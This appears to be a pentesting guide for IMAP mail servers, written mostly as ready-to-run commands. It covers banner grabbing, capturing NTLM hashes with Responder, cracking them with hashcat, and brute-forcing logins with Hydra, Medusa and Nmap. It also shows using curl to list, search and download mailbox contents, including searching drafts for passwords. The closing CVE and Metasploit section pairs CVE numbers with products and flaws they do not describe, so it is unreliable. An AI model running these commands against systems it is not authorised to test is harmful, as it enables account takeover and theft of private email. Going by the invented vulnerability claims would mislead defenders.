IMAP - Port 143, 993

Basic info

The Internet Message Access Protocol (IMAP) is a standard protocol for accessing and managing email on remote servers. Widely used in enterprise environments, it facilitates seamless email synchronization across devices. IMAP primarily operates over ports 143 (unencrypted) and 993 (encrypted). As a penetration tester, understanding IMAP's vulnerabilities is crucial, as improperly configured servers or weak authentication mechanisms can expose sensitive information or allow unauthorized access.

This guide provides an in-depth, technical approach to pentesting IMAP, covering reconnaissance, exploitation techniques, and practical tools for ethical hackers.

IMAP Overview

IMAP is designed to allow email clients to interact with email servers without downloading emails locally. Its primary features include:

• Port 143: Used for unencrypted communication, exposing data to potential interception.

• Port 993: Used for encrypted IMAP traffic via SSL/TLS, offering better security.

However, even encrypted IMAP traffic can be vulnerable to misconfigurations, weak authentication mechanisms, or software vulnerabilities.

Banner Grabbing

Banner grabbing is the first step to gathering information about the IMAP server. It involves connecting to the server and extracting banners that reveal server software, version, and potential vulnerabilities.

Tools and Commands:

1. Netcat:

   Copy

   nc -nv <IP> 143

2. OpenSSL for encrypted connections:

   Copy

   openssl s_client -connect <IP>:993 -crlf -quiet

Analysis:

The banner can reveal the IMAP server software (e.g., Dovecot, Cyrus), its version, and supported features like STARTTLS or AUTH=PLAIN, which can be leveraged during exploitation.

NTLM Authentication Information Disclosure

IMAP servers often support NTLM authentication, which can inadvertently leak sensitive information during communication. Attackers can exploit this to capture NTLM hashes and perform offline cracking.

1. Using Responder: Configure Responder to intercept NTLM authentication attempts:

   Copy

   sudo responder -I <interface> -rdwv

2. Initiate an NTLM Challenge-Response: Exploit IMAP’s NTLM authentication mechanism to capture hashes.

3. Extract and Crack Hashes: Use John the Ripper or Hashcat to crack captured hashes.

   Copy

   hashcat -m 5600 ntlmhash.txt rockyou.txt

IMAP Brute Force Attacks

Brute forcing is a common technique to test the strength of IMAP credentials.

1. Hydra:

   Copy

   hydra -L usernames.txt -P passwords.txt imap://<IP>

2. Medusa:

   Copy

   medusa -h <IP> -u <username> -P passwords.txt -M imap

3. Nmap NSE Script:

   Copy

   nmap --script imap-brute -p 143 <IP>

IMAP Syntax and Commands

Understanding IMAP’s syntax allows you to interact with the server manually and probe for weaknesses.

1. LOGIN: Authenticate a user.

   Copy

   a LOGIN username password

2. LIST: Retrieve available mailboxes.

   Copy

   a LIST "" "*"

3. SELECT: Access a specific mailbox.

   Copy

   a SELECT INBOX

4. SEARCH: Search emails based on criteria.

   Copy

   a SEARCH ALL

5. FETCH: Retrieve email content.

   Copy

   a FETCH 1 BODY[TEXT]

Using openssl s_client to issue commands over an encrypted session:

openssl s_client -connect <IP>:993

Then input IMAP commands manually:

. LOGIN user@example.com password
. LIST "" "*"

Listing mailboxes (imap command LIST "" "*")

curl -k 'imaps://1.2.3.4/' --user user:pass

Listing messages in a mailbox (imap command SELECT INBOX and then SEARCH ALL)

curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass

The result of this search is a list of message indicies.

Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:

curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass

Downloading a message (imap command SELECT Drafts and then FETCH 1 BODY[])

curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass

The mail index will be the same index returned from the search operation.

It is also possible to use UID (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.

curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass

Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the -v is required to see the subject and sender):

$ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<'

Although, its probably cleaner to just write a little for loop:

for m in {1..5}; do
  echo $m
  curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
done

Shodan:

Search for exposed IMAP servers:

port:143 "IMAP" OR port:993 "IMAP"

Known Vulnerabilities and CVEs

1. CVE-2019-3560: Dovecot NTLM authentication buffer overflow.

   • Exploitable via malformed NTLM packets.

2. CVE-2020-12675: Improper IMAP command handling in Cyrus IMAP.

   • Allows remote attackers to crash the server.

3. CVE-2022-23008: IMAP STARTTLS downgrade vulnerability.

   • Allows interception of plaintext credentials.

Legacy IMAP Servers:

1. Exploit STARTTLS Downgrade: Capture plaintext credentials:

   Copy

   openssl s_client -connect <IP>:143 -starttls imap

2. Buffer Overflow in NTLM Authentication: Trigger using a crafted payload with Metasploit.

   Copy

   msfconsole
   use exploit/windows/imap/dovecot_ntlm_overflow